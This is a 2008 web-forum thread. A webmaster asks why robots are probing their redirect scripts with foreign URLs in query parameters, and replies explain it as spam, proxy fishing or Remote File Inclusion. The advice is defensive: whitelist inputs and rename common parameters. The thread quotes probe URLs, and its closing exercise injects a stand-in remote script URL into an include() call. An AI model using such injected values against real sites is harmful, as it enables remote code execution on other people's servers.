Forum Moderators: phranque
On my pages there are a few harmless redirects using something like
... file.php?browsenode=1234
... file.asp?code=1234
... awredir.pl?tag=sourceid&url=http://mysite/real.page.htm
However, the redirects section of awstats is now overwhelmed with faked redirects generated by robots. Presumably they find the above and then return with their modification to add spurious URLs after the =
for example:
... file.php?browsenode=http://www.example.com/omch/img/itofu/viroja/
... tag=http://www.exampleZZZZ.co.kr/main/created/product/2/upu/ohoqoh/
(the ZZZZ obscures part of the URL which I hope will be acceptable to post while still demonstrating what is going on. I refuse to visit these URLs because there is no telling what mischief they hold.)
Within one minute, the server log shows numerous variations are attempted with many other wierd URLs.
So what is the robot trying to do?
[edited by: phranque at 1:26 am (utc) on Feb. 7, 2008]
[edit reason] examplified [/edit]
I suspect they are trying to find:
1) redirect scripts that they can exploit for sending SPAM (SPAM recipients see YOUR domain first in the URL and assume that YOUR domain is the one SPAMMING them)
2) message boards where they can post lots of URL SPAM
The robot parses, and upon finding?tag=this&url=that will substitute preferentially using the &url=robotsURL
Using a text browser I found at a whois-lookup type site, I find the domain name in each case I checked is a valid site, but the full URL end with random-letter name directories that do not exist on that site.
The same non-existent URL, example
... www.example.de/Webgalerie/bilder/Italy/une/yiwul/
is requested by the different IP's
So the robot's target URL makes no sense... how can it be trying to spam or post if it generates a non-existent URL? If not to spam, then why?
[edited by: phranque at 1:24 am (utc) on Feb. 7, 2008]
[edit reason] examplified [/edit]
They are fishing for web proxies. The URLs are probably formatted for well-know web proxy scripts.
If you had the script installed that they are looking for, YOUR site would then proxy the connection.
Presumably, you don't have these scripts installed, but just ones that look like them.
Not much you can do now except to filter the bots, as changing the URL paths without putting in a redirect to the new ones would mess-up your search-engine rankings.
In the future, it's probably best to avoid using common words that might be used by scripts that bots are fishing for. You could make more meaningful and specific URLs. Or another easy way to do this would be to prepend or append some site-specific string to the URLs. (Say, your site is example.com, prepend "ex_" to them.)
That is, don't use "browsenode", "code", or "tag". Use, for example, "my_browsenode", "hoohoo_code", "blah_tag". Hopefully, though, something more meaningful.
onclick="window.location.href='/clickstat.php?id=45&ref=/category/category-name'; return false;"
and I've also seen some of these strange URLs as referers, on my click stat page. Instead of having the 'ref' parameter (see above) set as '/category/category-name' (an internal page on my website)the 'ref' sometimes show a URL like this:
http:*//www.example.de/Webgalerie/bilder/Italy/une/yiwul/
I'm glad that my redirect script collects the URLs from a database via an id number instead of allowing a direct url to be typed in.
[edited by: OutdoorMan at 11:08 pm (utc) on Feb. 6, 2008]
[edited by: phranque at 1:22 am (utc) on Feb. 7, 2008]
[edit reason] examplified [/edit]
The result for the visitor is a click that simply takes them to
[externalsite...]
while the click shows up with the mymarker tag in the redirects section of the awstats report.
Thus awredir simply outputs something like this literal string "http://externalsite/pagelinked" which a visitor's browser interprets and loads that URL. If I am understanding correctly, it is the visitor's browser IP that loads the externalsite page so my server is not being used as a proxy?
The robot is making a request like the top example, but putting its own URL in for the external page.
So is awredir.pl subject to abuse of any kind that would mean I need to modify the perl script to permit only the external sites I expect to use?
... file.php?browsenode=http://www.example.com/omch/img/itofu/viroja/
... tag=http://www.exampleZZZZ.co.kr/main/created/product/2/upu/ohoqoh/
So what is the robot trying to do?
It is a Remote File Inclusion (RFI) attack. They are hoping that your code accepts the parameters they provide without checking for validity.
If they succeed in passing a URL parameter into your script, then your script will include the script hosted on the remote site. It will then run as part of your own script, having the same level of filesystem access that your script has. Needless to say, they can do a lot of damage that way.
If you check a few of the remote links you see referenced in the query strings of those requests, you'll probably find that most of them are PHP scripts that either modify your site files or try to execute operating system commands.
There are many ways to protect against RFI attacks. What defense methods you can use depends on what you can "afford" to block or disable. That is, you can't block or disable methods that you use yourself. (But you *can* lock them down so only you can use them and no one else can.)
One important way is by defensive coding. If you expect an incoming value for browsenode, which can be 1, 2, or 3, you should code like this (pseudocode):
switch(browsenode)
{
case 1: dosomething(); break;
case 2: dosomethingelse(); break;
case 3: dosomething3(); break;
default: doNOTHING() or doSomethingThatIsSAFE!(); break;
}
That way, if an attacker attempts to inject a browsenode value you weren't anticipating, nothing bad will happen.
As an exercise, consider the following code:
include(browsenode);
What will happen if a hacker injects the following value for browsenode: http: // othersite . com/ shellscript.php
(spaces added to avoid it turning into a link).
[edited by: SteveWh at 12:08 am (utc) on Feb. 8, 2008]